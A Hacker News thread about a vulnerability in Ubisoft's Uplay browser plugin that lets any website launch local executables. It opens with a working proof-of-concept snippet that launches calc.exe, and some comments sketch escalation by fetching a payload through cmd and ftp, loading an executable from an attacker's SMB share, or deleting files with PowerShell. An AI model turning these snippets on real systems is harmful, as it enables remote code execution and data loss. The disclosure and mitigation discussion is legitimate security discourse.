Hacker News new | comments | show | ask | jobs | submit login
Ubisoft "Uplay" DRM exposed as rootkit
317 points by rightclick 1456 days ago | hide | past | web | 136 comments | favorite
If you play one of the games below try clicking on this link (tested with Assassin's Creed on Win7 and FireFox).


  var x = document.createElement('OBJECT');
  x.setAttribute("type", "application/x-uplaypc");
  x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Ubisoft installs a backdoor that allows any website to take over your computer. The Sony BMG rootkit was also DRM and required product recall when it was discovered.


    Assassin's Creed II
    Assassin's Creed: Brotherhood
    Assassin's Creed: Project Legacy
    Assassin's Creed Revelations
    Assassin's Creed III
    Beowulf: The Game
    Brothers in Arms: Furious 4
    Call of Juarez: The Cartel
    Driver: San Francisco
    Heroes of Might and Magic VI
    Just Dance 3
    Prince of Persia: The Forgotten Sands
    Pure Football
    Shaun White Skateboarding
    Silent Hunter 5: Battle of the Atlantic
    The Settlers 7: Paths to a Kingdom
    Tom Clancy's H.A.W.X. 2
    Tom Clancy's Ghost Recon: Future Soldier
    Tom Clancy's Splinter Cell: Conviction
    Your Shape: Fitness Evolved

Oh hell no. I can't believe this shit... and Tom Clancy's Ghost Recon: Future Soldier was such a good game too. T_T

Next time I want to play an Ubisoft game I'm just going to pirate it.

EDIT: I buy 99% of my video games through Steam, and when the games I get through Steam want to use their own launcher (play, windows live games, or EA's Origin, for example) I always get peeved.. to find out it allows arbitrary remote code execution is absolutely infuriating.

EDIT: Oh, btw, I'm using Opera 12.

EDIT: Protect yourself (in Opera, at least) by going to Settings -> Preferences(menu option) -> Advanced(Tab) -> Downloads(left menu bar) -> Search for "uplay" and delete the associated row.

I hate the hoop jumping in modern games. I was playing Street Fighter 4 recently and it comes up with "oh, you want to save your single player game? You have to create a MicrosoftWindowsBingGamesPhone8ForXboxLive.Net account" .

Then of course you have to wait for the damn thing to sign in every time you want to play the game "Connection failed, do you want to retry?"

I've found myself having to deal with roughly 100% more bullshit launcher-patch-launcher-settings-signup-login-wait crap since I've started buying games on Steam instead of just straight up pirating them like I did when I was dirt poor.

Honestly, about 1 in every 2-3 games I play I find myself wondering why I didn't just pirate it to begin with. When your software has the kind of extra "features" that make your user base actually consider downloading a cracked, illegal copy after buying the real deal, you know you've royally fucked up somewhere along the way.

Short of doing extensive background research on a title, Steam has no indication of a game's dependence on some third party launcher or cloud service, so every time I run a new game for the first time I have to clench and pray the Windows Live overlay doesn't drop down.

Meaning: I feel your pain, brother.

You sure about that? Section 8: Prejudice [1] (the only GFWL game I own) lists Games for Windows Live under 3rd party DRM.

On the other hand, the Batman: Arkham Noun games [2,3] list SecuROM in 3rd party DRM but not GFWL. I'm told that these games are both GFWL titles.

I don't know what's going on there, but it looks inconsistent.

[1] http://store.steampowered.com/app/97100/

[2] http://store.steampowered.com/app/35140/

[3] http://store.steampowered.com/app/57400/

Arkham City requires GFWL, almost made me quit the game I bought and go pirate it. Still considering it, honestly.

Not only did it fail to log me in the first time and totally dropped my first hour of gameplay, but I ended up having to reset a password and spend over half an hour trying to get Arkham City and GFWL live to work together.

I lost over 1.5 hours of time to that bullshit, and a pirate would have lost 0 hours.

I am ONCE AGAIN bitten in the ass for being a legitimate customer instead of a dirty pirate.

Fable 3 doesn't mention GFWL anywhere, except that it's published by "Microsoft Games Studios" which would be a big hint... if you look at publisher info.

Which is why I say it's usually a crap shoot. :(

EDIT: In terms of Tom Clancy's Ghost Recon Future Soldier specifically, it doesn't mention Uplay anywhere on the Steam store page at all. It's like "surprise! This 3rd party launcher / DRM / rootkit comes with it, absolutely free!"

Batman: Arkham Asylum requires a Windows Live account, not sure about the new one.

Perhaps it is not listed if it is only used to enable "social gaming" but DRM is done by some other software.

Just spotted it, the Batman games hide it in the System requirements:

> Online play requires log-in to Games For Windows – Live

So I guess it's in the DRM list if you need it to play singleplayer, and in system reqs if you don't. Seems fair, but I'd still rather have it be consistent. No reason S8 couldn't list it in both spots.

Still, I habitually don't read System Reqs. I'd expect something more like one of the "Single Player", "Multi Player" bullets under the ESRB rating. "Requires 3rd party bullshit"

Agreed. There's no game that my desktop doesn't meet the minimum requirements for, and won't be for at least a few years. I don't make a habit of checking them.

Couldn't Steam pull the game from their shop? Prevent new people from buying it and remotely de-activate/remove existing installs of the game?

Proponants of the walled garden 'App Store' model point out how it's good for users, since it's more secure. Well, is this a case for that? Will the closed app store model step up to the plate now?

Or is the walled garden no better for users, but much better for the sellers of software?

When a walled garden actually is better for users, they could choose to participate. When users aren't allowed to choose, you can be pretty sure who the primary beneficiary is.

I just wish there was some option that would let Steam warn me if something like this was going to happen.

I'm just not buying any more Ubisoft games. Between the abortion of the user experience that is UPlay, their crappy always-online DRM, and then this, I'm just done giving them my money, I don't care how much I like their games.

There's no shortage of good games to play, and I'm just not going to give my money to companies that abuse their customers like Ubisoft does.

Hey Ubisoft, because I hope someone there is reading this thread: When your DRM is so bad that it makes people who would otherwise buy your games want to pirate them, you have utterly, totally, and completely failed. Pass that on to your boss please.

Edit: Protect yourself in Chrome by going to about:plugins and just turning it off.

Pirating the software does not do anything here. The security hole is not related to the DRM and pirated versions come with the same UPlay installs as legitimate copies.

"Next time I want to play an Ubisoft game I'm just going to pirate it."

Another good reason to pirate Ubisoft's games is that none of them work when Uplay is down. Uplay is down a lot more often than never.

Next time I want to play an Ubisoft game I'm just going to pirate it.


I wouldn't say that this is a rootkit (there's no kernel-based magic or even just privilege elevation going on), nor that this was done with bad intentions.

This is just inexperienced developers («it's "encrypted" using base64 - we're fine!!») that had a "great idea" (= launch games from an embedded IE control) that has, kinda, backfired.

The sad thing is that it would be trivial (I'm using the word "trivial" here are I have implemented something like this just last friday in 3 hours) to add a signature to that command line and only execute signed command lines - I mean, these Games require an internet connection anyways, so there's nothing stopping them from serving the launcher from somewhere in the web and have a private key there to do the signing.

Just for your information; rootkits can exist in any of the rings[1]. However, kernel-mode rootkits are most often harder to detect and get rid off. There are several definitions of a rootkit, a common definition is "software designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer."[2]

[1] http://en.wikipedia.org/wiki/Ring_(computer_security) [2] http://en.wikipedia.org/wiki/Rootkit

It doesn't seem like they went to any particular lengths to hide it, just nobody bothered to look very hard, and you wouldn't expect them to be installing browser plugins. Sony's DRM system, on the other hand, was an actual rootkit and went to a lot of effort to bury itself in the infected system.

Maybe people would prefer to call it a "backdoor" instead, but this is quite disconcerting. I'm very glad I don't play any of those games.

Original source: http://seclists.org/fulldisclosure/2012/Jul/375

For people who are only skimming that message, note that this is not limited to ActiveX. In fact, the mention of ActiveX in the message's subject is regarding an unrelated topic that Ormandy happened to reply to.

One of these day I'll have to buy an IDA license. I keep seeing amazing uses of that disassembler.

You can begin with the freeware version.

Why does Tavis Ormandy (http://seclists.org/fulldisclosure/2012/Jul/375) keep putting fully usable proof of concept exploits out for widely deployed software without giving a vendor time to prepare a patch, or in this case, even notifying them? Off the top of my head, I remember he did this for the windows help center exploit and the java web start exploit. I can't understand why you would do this. You could at least give the vendor a couple weeks, and then if you're super worried, release the details as soon as an exploit is found in the wild.

As-is, he just seems like a raging hacker who loves attention and doesn't care if thousands of unsuspecting users get their credit card details stolen by malware authors. I must be misunderstanding something, yeah?

Because the company wasn't acting in good faith? IMHO they put that there on purpose and they deserve to be exposed as evil bastards that they are.

What makes you believe they put it there on purpose? It appears to have a genuine (if insecure) purpose. Even the researcher's message on seclists implies he thought of it as a bug.

it's completely unneeded.

I can launch Steam games from my browser without any plugins.


Well those games are not only sold through Steam you know so they still "needed" this feature to work without Steam.

Protocol handlers are a pretty shitty way of interfacing with desktop apps. There's no two-way communication and no error handling. Lots of potential screw-ups and incompatibility issues will/can happen. Sure, they don't require a browser plugin but that's about the only advantage.

Do you have any evidence they put that here on purpose or are you just spreading rumors? It could as well be shoddy programming.

If they are going to install low level software on my computer they better be very sure it's properly coded.

Instead, they ask for their interns to build the "solution" that makes my computer part of the Borg.

I really don't feel compassion in this case towards the company (towards the users is a different story, no doubt)

If they are going to install low level software on my computer they better be very sure it's properly coded.

Companies are often incompetant with security code. If you are expecting high quality secure code with consumer level software, you will often be disappointed.

Which is why going the full disclosure route prevents them from being insulated from their mistakes - otherwise, it becomes a moral hazard to keep playing nice with the approach to disclosure.

I don't subscribe to "never attribute to malice that which is adequately explained by stupidity". I'm not citing sources - hence it's just my opinion. Reminds me of google wifi slurping and hundreds of other cases where everyone plays dumb and swears it was all a misunderstanding. It never is. Until you get caught. And if not that it's a rogue trader, rogue reporter, rogue programmer, rogue scapegoat.

Since we have no additional evidence to select between the two options, do you really think that malice is simpler than stupidity?

I'm not going to do any kind of full disclosure here (I know this is lame) but I work in video games so I know what it looks like from the other side. We're not all idiots here, we just do as we're told.

As a Vancouverite, I've seen enough layoffs to believe this entirely (you're fungible and replaceable). Still, I don't think that Ubisoft intentionally created a security issue, just that they didn't care about one that happened and deadlines were coming.

I didn't mean to imply that video game programmers were stupid... :)

I was saying it seems more likely to me that any random developer making a stupid mistake like this seems more likely than a company having real motivation to create this kind of security hole.

I suppose, alternatively, this could have been an individual developer's intent. An exploit like this would get a pretty penny on the exploit market, I'd think.

"I can't prove it through fact, but I feel it to be true."

Not subscribing to malice what can explained by stupidity is just a feeling too.

The question is: do you believe the perpetrator to be malicious or dumb?

It's not a "feeling" when all evidence points to the fact that, like every security vulnerability ever, a feature was added that had unintended consequences. There's no way it's malicious: Ubisoft can't do anything with this that they can't do everywhere else in the actual applications themselves!

Who says it was malicious on Ubisoft's part? It could easily have been a rogue developer that saw an opportunity to install a backdoor on a ton of machines.

It could also have been the Russians, who planted a mole in Ubisoft's quality assurance division and, over time, laying low in a foreign country gaining the respect of his peers and bosses, slowly worked his way to the top of the food chain...

...where at last he installed his Russian Rootkit.

Or maybe some programmer added a feature that was insecure and they moved on to work on some bug that was crashing level three?

Usually both. (Note that with the internet you also have to be dumb, too, to believe you are not eventually going to be caught, no matter how malicious you are.)

That's not how reality (or science) works.

The fact that the line contains "dev" twice is probably indicative of forgetting to disable it.

Or really tight dates to meet and rushing.

What would "they" have to gain from this ability? Ubi has already capability to execute arbitrary code on your machine via it's uplay software, they don't need a hole in browser plugin for that.

A web-based portal. List all the games you have registered and click on the link to launch it, whether it's a game installed on your PC or a link to a facebook game.

Giving a browser plugin the ability to run any program on the user machine without any kind of validation or prompting is so stupid/evil that they deserve the worst PR backlash they can get.

Also, that's probably the quickest way to get them to release a fix.

The full disclosure debate goes back a long time. I recommend doing some light Googling to understand some of the counterpoints.


As for your "raging hacker who ...," dig, consider the idea that malware authors already knew about the vulnerability and have been using it.

consider the idea that malware authors already knew about the vulnerability and have been using it.

Do you have any evidence that is the case? The original post didn't mention it.

Otherwise it just sounds like excusing irresponsible disclosure.

The term you are looking for is Coordinated Disclosure.


Many believe it is irresponsible to delay informing users that they have a major backdoor exposing them.

I asked a question. If you're going to downvote me for having a wrong opinion, you should at least respond and tell me me the answer to my question, like 'this is proper behavior for a security researcher because X'.

Those games are pretty mainstream, I can't imagine how many gamers are getting rooted as we speak. I'm glad ubisoft are getting their asses kicked over this (especially with their history of aggressive DRM'ing) but for the users that's terrible. So no, I don't think that's very responsible.

That being said, installing a "sudo" plugin in everybody's browser without any security validation (if I understand correctly what this is about) would be hilarious if it wasn't that tragic. But gamers are gamers, they forgave sony, they'll forgive ubisoft too, and they'll never learn.

If you could install a sudo plugin to my browser when I install your game would imply that I could have also installed a sudo plugin. If I (a non-root) user can do that, you already have a problem. (I am assuming you mean a sudo plugin that does not need a password to root)

You asked a very laden question. You have no doubt encountered discussions about full-disclosure to know the arguments against it; giving a one-sided rehash of that topic is a provocative way to invoke an old and tired discussion.

This appears to be an exploit one can mitigate simply by removing that plug-in from one's browser. As such, exposing it to all is a good thing. It needs to be patched ASAP, not hidden.

Ref: http://pc.gamespy.com/articles/122/1225585p1.html

Very few comapnies will pay for this type of exploit, even fewer will offer a thanks. It's easier to get them fixed this way.

The question is whether it's easier for the security researcher or the users. I don't think it's easier for the users if they end up being exploited for weeks while the vendor rushes to fix it.

If the vendor tries to delay you for months or ignores you, sure. But it doesn't even seem like he tested the exploit here to understand whether it was a serious threat.

They're not his users, and the company- who allowed these vulns. in the first place- isn't trying to pay him for his work; see Google, CCBill, Mozilla, ect.

Google chrome users: You can go to "about:plugins" and disable this and all other things that might expose you to extra security risks such as "Microsoft Office" (even "Native Client") or any other plugins that exposed in there by 3rd party without any confirmation.

I think they just fixed this. It opened Uplay and it instantly downloaded a new update released today.

Version 2.0.4 - Monday July 30th 2012 - "Fix addressing browser plugin. Plugin now only able to open Uplay application"

I would love to see how they patched it. Seems folks like these might implement a check like 'cmd.Contains("uplay.exe")' and let you do "C:\whatever\uplay.exe\..\..\bad.exe".

I'm not sure if that's what the OP implied, but I'm not sure this was done on purpose. "Never attribute to malice that which is adequately explained by stupidity". Ubisoft is well know for their aggressive anti-pirating practices (cloud saves for instance), but that's just too idiotic.

Here's taviso's mail on seclists: http://seclists.org/fulldisclosure/2012/Jul/375

I hope ubisoft reacts quickly.

If they can't do a crippling DRM properly, then maybe they have no business building one at all.

Stupidity can also be criminal.

When trying to understand how this happened and what Ubisoft will do about it I agree that it probably was stupidity rather than malice. But when considering whether to do business with Ubisoft in the future remember Grey's Law: "Any sufficiently advanced stupidity is indistinguishable from evil".

Looks like they have: http://news.ycombinator.com/item?id=4312528

This is a social integration feature and not part of their DRM.

This is concerning. Does anyone have any links to comments by Ubisoft? Any reason why they would need the ability to execute arbitrary code in a hidden manner? From what I understand, we call these things Trojans...

UBI is not alone doing this.

Battlefield 3 also installs it's plugin ("ESN Launch Mozilla Plugin") in all browsers on a pc. It's capable of running EA's Origin service, so does it present the same threat?

Also, game publisher Nexon silently installs a browser plugin (Nexon Game Controller) on many (all?) of its games, none of which AFAIK need a browser:

Vindictus/Mabinogi Heroes

Dragon Nest


Atlantica Online

Combat Arms

Without need to discuss security implementations - no.

I have several of these games (SWS, PoP, Heroes MM VI) installed as well as UPlay but do not have any file associations for the type listed. Nor is "x-uplaypc" anywhere in the registry for the Windows shell.

I also have titles that use online login from Ubi such as ANNO 2070 installed.

I think the list of affected titles is far smaller than listed.

How and when is this associate set? Has someone identified which application in the installer performs it? Is it a particular UPlay version?

I don't doubt they are setting this up to allow them to run games from a browser. EA does it with Origin, Valve does it with Steam, as well as numerous other applications.

I don't doubt its existence but I think people are starting a wildfire without enough facts. I can't even seem to research this because it's not on my machine.

Confirmed that this works on Win7/Firefox/Prince of Persia.

Wow, well I already knew ubisoft were fisting me, but two hands? cmon.

Oh please, I know you're being light hearted, and repeating common cultual memes, but please keep the "recieving anal is submission" to your self. It's often used as an excuse to call gay men "not real men" or effeminit. People (of all genders & sexualities) who like fisting are not evil either.

And should we also stop saying we've gotten "fucked" for similar reasons? Since you are the curator and sole arbiter of allowable phrases, I'd like to get it all clear while I've got your ear.

And should we also stop saying we've gotten "fucked" for similar reasons?

Sorta. Tis roughly the similar overtones of 'people-who-take-it-are-bad' (i.e. everyone who isn't a straight cis male), however it's not as graphic and not as tied to the actual imagery of receptive sex as the previous example.

Since you are the curator and sole arbiter of allowable phrases

What? No I'm not. Who said I was? Not me. Just because I call someone on something doesn't mean I'm the sole arbiter of things. How many articles on this site will lambaste some technology? Lots. Do we reply with "Shut up! you're not the sole arbiter of programming languages"? No that's not what happens here. One should talk about the merits of the complaint, rather than try some little deflection tactic.

What about usage of the word "use"? Surely that implies interacting with another person only for sex and we should stop using it lest we offend.

I was not deflecting, that was my way of talking about the merits of the complaint, to whit, what you object to might be a tiny subset of someone else's objections, in which case who gets to decide? By telling that person not to use that terminology, you are saying you get to decide.

I think we've also seen plenty of people who think they are the sole arbiter of programming languages, and they get called out on it.

What about usage of the word "use"? Surely that implies interacting with another person only for sex

No, the word "use" means lots of things. To give you an idea, lots of people are OK with people saying "use" in polite, professional contexts, or day time TV, but lots of people would not be OK with "fuck" or "fisting with two hands" in professional contexts. There is a difference between them. If you cannot tell the difference, people might get annoyed at you in many situations.

we should stop using it lest we offend

It is a common retort from people who want to continue to say things that marginalise some minorities to claim that "It's polticial correctness gone mad!" or "you can't say anything anymore!". You've just done that, you're trying to imply that I would have a problem with the word "use" to further your strawman argument that "You can't say anything anymore lest you offend!". No-one's suggesting that there's anything wrong with "use". But there is something wrong with calling anyone who anal bad, or anyone who might engage in receptive sex (i.e. all non-straight-cis-males) bad.

I'm not trying to imply you have a problem with the word "use", I am directly implying that there is some boundary beyond which someone will be offended and you will not be. At which point whose delicate sensibilities should we defer to?

I, for one, take exception that your category of people who enjoy receptive sex seems to be explicitly excluding straight males, such that you've used the exact same "i.e." qualifier twice. It is well within the realm of possibility that a straight male would ask his partner to stimulate his prostate during sex, but you categorically reject that. Are you going to correct your mistake and stop making generalizations? Maybe start using e.g. from now on?

My position is this; it is obvious that the original poster is not making some kind of blanket statement that all people who participate in anal sex are bad, but rather is stating that having a large object in your anus is uncomfortable and having an entity do it to you while you are unwilling is horrible. It's not a statement that was attempting to marginalize minority groups. You are the one who misconstrued it to mean all gay men are evil. Maybe that's why you find people's objections to your attempted control over the English language to be common.

Finally, you seem to be annoyed that I "created a strawman argument" out of you, but you do feel free to contort my statements into "it's political correctness gone mad!", and "you can't say anything anymore!" as well as directly stating that I am someone who "wants to continue to say things that marginalize some minorities". Is ad hominem less of a logical fallacy than making a so-called strawman argument? I'm not going to continue arguing with someone that has such intellectual dishonesty because it's just a waste of time. I am done here and I won't be reading any responses you post, so you can save yourself some time there.

More like two feet.

AFAIK Sony never installed backdoors, and I thought they were the worst of the DRM crowd.

If this was something released by Valve would it be described as a 'rootkit', or more of a dumb mistake? The internet loves Steam and anything and everything by Valve and hates Ubisoft.

By all means, bring out the inept rootkit installed by Steam which creates any remotely comparable vulnerability in as many PCs.

So does this have some legitimate use on the web (such as product activation on the Ubisoft website) or is this an ActiveX component intended to be used locally that could have been marked as "safe for scripting" by mistake?

Edit: Other comments suggest there's a NPAPI plugin as well so it's definitely intended for use on the web.

Also in what sense is this a rootkit? Is this purposely hidden from the list of IE addons or something?

Because of people like this (the straw was Growl installing itself for the third time), I've had to completely change the permissions on particularly vulnerable folders in OS X. Anyone creating software, if you are not already aware of this: installing anything that is not completely and clearly explained beforehand makes you a despicable wretch.

FWIW growl doesn't install itself, applications that use it are _supposed_ to offer to install growl for you, but there's been a few that don't and just force it on you.

The growl devs really really hate those applications - http://growl.info/thirdpartyinstallations.php has more info.

The third party applications are using the Growl framework, yes? Did they write the extra code to install Growl? If so, I am sorry. If, as I suspect, they did not, why does the Growl framework not ask the user when that method is invoked?

Even though the original vulnerability was quite lame and violated the first rule of writing an ActiveX plugin (site-locking and making it only available over HTTPS otherwise it's still vulnerable to code execution via MITM).

It's impressive that they already updated Uplay to address this problem (not sure whether the fix is actually working or not though).

Doesn't work for me in either IE or Chrome, and I have AssCreed II, AssBro, AssRev, and Forgotten Sands all installed. There is also no uPlay plugin to be found in either browser. I suspect this only applies to certain versions of uPlay; whether newer or older than the version I have installed, I have no idea.

Any mitigation ? Is it possible to disable this browser plugin ?

Google and Mozilla will certainly add it to their plugin blacklists. Trojan capabilities remote-controlled through a browser, that's a very serious security risk to their users.

A bug is filed to blacklist it in Firefox: https://bugzilla.mozilla.org/show_bug.cgi?id=778686

Yes for chrome : http://news.ycombinator.com/item?id=4311597 should be same for Firefox, IE might require a little bit more. Not sure how it works in IE8+

In Firefox, open "about:addons" in the location bar, select "Plugins" on the left, then you can disable/remove as necessary.

This is an simple, obvious and extremely dangerous error, that anyone with experience or appropriate education would have avoided.

There's an evident frivolous attitude towards technical quality control present here, and everyone should avoid installing games requiring uPlay for the time being.

Hows does it work on Firefox? Does Ubisoft install an NPAPI plugin for browsers without ActiveX?

Ok, looks like the game can execute an existing exe file already on the machine, is there currently any proof of concept for actually downloading and executing arbitrary code? Or even specifying commandline arguments for the exe file?

This does not 'install a backdoor that allows any website to take over your computer', right? It just makes it possible to launch any previously installed executable if you know the path.

> It just makes it possible to launch any previously installed executable if you know the path.

Well yes, it allows "offline" privileges to essentially any online site (if you can launch arbitrary executables, you can download and execute arbitrary payloads). And considering there is still a rather prevalent culture of running Windows as an administrator account (if only because some softs fail rather annoyingly and without trying to escalate when launched without adminstrator priviledges) for all intents and purposes it gives pretty wide control of the machine to any URL you connect to.

If it can execute cmd.exe, it can do pretty much anything it wants, including but not limited to downloading other apps and running them.

> It just makes it possible to launch any previously installed executable if you know the path.

You say that as though it's some kind of hurdle.

C:\>ftp -h

Transfers files to and from a computer running an FTP server service (sometimes called a daemon). Ftp can be used interactively.

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]

If someone can launch any executables on your machine, you can consider it to be fairly dangerous.

I know, but that's not what the submissions says. It feels a bit sensationalized.

Those two things are equivalent.

I don't agree. The OP makes it sound like it's a malicious backdoor installed by Ubisoft to get superuser access to a system. In fact, it's just a badly programmed way to launch games / any executable. To do anything else, you will have to find a way around the other security mechanisms, such as UAC.

I am in no way trying to say that this can not be dangerous, but it's different from what we would usually call rootkits.

You can run a cmd without prompting the UAC you know... or worse... a PowerShell. You know powershell can do a lot of horrible things to your computer with not a single UAC prompt.

For instance, the remove-item commandlet, its description goes like this "The Remove-Item cmdlet does exactly what the name implies: it enables you to get rid of things once and for all. Tired of the file C:\Scripts\Test.txt? Then delete it"[1]. No UAC prompt. Bingo, let's start erasing this annoying C:\Users\Username\Documents.

And this is only one example, give me 1 hour and I can find several ways to fuck up your computer with a powershell open :-).

[1] http://technet.microsoft.com/library/ee176938.aspx

I'm curious, could it be possible to implement a simple SMB listener in javascript and then send send "\\<my-ip-address>\my_virus.exe\" (encoded in base64) as orbit_exe_path?

afaik you can just specify your server's IP address and it will use WebDAV.

You'd have to implement a TCP server listening on a privileged port (< 1024). Surely no browser would allow this.

I'm not sure about windows, but on all the un*xes I know you need to be root (or have the right capabilities) to create a port with number < 1024. So even if the browser doesn't enforce this, the OS should.

No, but you might be able to run cmd then the ftp command to download the payload.

Add Anno 2070 to the list

I've played Anno 2070. It's been removed from my list.

How is this a rootkit when the user installed it and got notified of a plugin browser installed ? Strange behavior yes but no rootkit !


Apparently they've patched this now, according to their twitter.

I have uplay installed on my games pc along with all available AC games. Neither chrome nor firefox have this plugin installed. Auto-removed after being blacklisted? Or never installed?

It might give an extra layer of protection if a browser actually bothered to ask the user if they wanted to enable the plugin if they didn't explicitly ask to install it themselves.

Couldn't get it to work with R.U.S.E win7 Firefox/Chrome/IE

Is this a Windows only exploit? I have RUSE installed via Steam on a Macbook Pro and the linked page reports a missing plugin in Chrome, Safari, and Firefox.

Not owning any Ubisoft titles and not really interested in opening up IE, can someone explain what it is that Ubisoft/IE users are seeing?

That is why I stopped buying DRM enabled games.

It is better to live without having played these games, than to expose myself to such security risks.

I don't get it. What does the link do? It opens Uplay for me and starts an update. What does that mean?

Just because it is a security hole, doesn't make it a root kit. This is just a dumb security hole.

"Ubisoft Uplay DRM exposed as rootkit; dozens of popular games hacked"? Idiots.

Thank you for expanding the list of games I should never buy.


This was fixed this morning. No need to go ballistic over it. It's not a rootkit.

So much for the "Master Race"


"(tested with Assassin's Creed on Win7 and FireFox)."

Since when exactly does Firefox allow ActiveX components?

There's apparently an NPAPI version of the plugin with the same hole.

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact